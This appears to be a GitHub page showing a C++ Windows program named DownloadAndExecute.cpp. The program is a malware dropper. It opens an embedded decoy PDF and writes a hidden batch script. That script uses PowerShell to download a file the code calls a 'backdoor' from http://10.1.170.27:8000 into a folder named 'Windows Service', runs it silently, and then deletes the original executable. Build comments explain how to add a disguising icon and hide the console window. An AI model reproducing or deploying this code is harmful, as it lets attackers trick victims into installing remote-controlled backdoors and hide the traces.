-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathDownloadAndExecute.cpp
More file actions
78 lines (72 loc) · 2.8 KB
/
DownloadAndExecute.cpp
File metadata and controls
78 lines (72 loc) · 2.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#include <fstream>
#include <iostream>
#include <cstdlib>
#include <thread>
#include <chrono>
#include <Windows.h>
#include <string>
#include <urlmon.h>
#include <filesystem>
#pragma comment(lib, "urlmon.lib")
using namespace std;
// https://tomeko.net/online_tools/file_to_hex.php?lang=en
unsigned char pdfData[] = { /*paste pdf data here*/ };
size_t pdfDataSize = sizeof(pdfData) / sizeof(pdfData[0]);
void createPDF(std::string filePath)
{
std::ofstream outFile(filePath, std::ios::out | std::ios::binary);
if (!outFile)
return;
outFile.write(reinterpret_cast<const char*>(pdfData), pdfDataSize);
outFile.close();
}
void openPDFNonBlocking(const std::string& filePath)
{
std::wstring wideFilePath = std::wstring(filePath.begin(), filePath.end());
LPCWSTR lpcwFilePath = wideFilePath.c_str();
ShellExecute(NULL, L"open", lpcwFilePath, NULL, NULL, SW_HIDE);
}
void CreateDownloaderBat()
{
char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);
std::string batFilePath = std::string(tempPath) + "temp_downloader.bat";
std::string downloadScript = R"(
@echo off
setlocal
set "APPDATA_PATH=%APPDATA%"
set "DIRECTORY=%APPDATA_PATH%\Windows Service\"
if not exist "%DIRECTORY%" mkdir "%DIRECTORY%"
set "URL=http://10.1.170.27:8000/win32service.exe"
set "BACKDOOR_PATH=%DIRECTORY%win32service.exe"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(New-Object System.Net.WebClient).DownloadFile('%URL%', '%BACKDOOR_PATH%') "
start /b "" "%BACKDOOR_PATH%"
endlocal
)";
std::ofstream batFile(batFilePath);
batFile << downloadScript;
batFile.close();
std::wstring wideBatFilePath = std::wstring(batFilePath.begin(), batFilePath.end());
ShellExecute(NULL, L"open", wideBatFilePath.c_str(), NULL, NULL, SW_HIDE);
}
// for icon : project(right click) -> Add -> Resource -> Icon -> Import -> select icon file
// project -> properties -> Linker -> System -> SubSystem -> "Windows (/SUBSYSTEM:WINDOWS)"
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
wchar_t exeFilePath[MAX_PATH];
GetModuleFileNameW(NULL, exeFilePath, MAX_PATH);
char narrowExeFilePath[MAX_PATH];
size_t convertedChars = 0;
wcstombs_s(&convertedChars, narrowExeFilePath, MAX_PATH, exeFilePath, MAX_PATH);
string myexefilepath = narrowExeFilePath;
string myexefilename = myexefilepath.substr(myexefilepath.find_last_of("\\") + 1);
myexefilename = myexefilename.substr(0, myexefilename.find_last_of("."));
createPDF(myexefilename + ".pdf");
openPDFNonBlocking(myexefilename + ".pdf");
CreateDownloaderBat();
// Delete the executable
wchar_t command[256];
swprintf_s(command, L"start /min cmd /c del %S", narrowExeFilePath);
ShellExecute(NULL, L"open", L"cmd.exe", command, NULL, SW_HIDE);
return 0;
}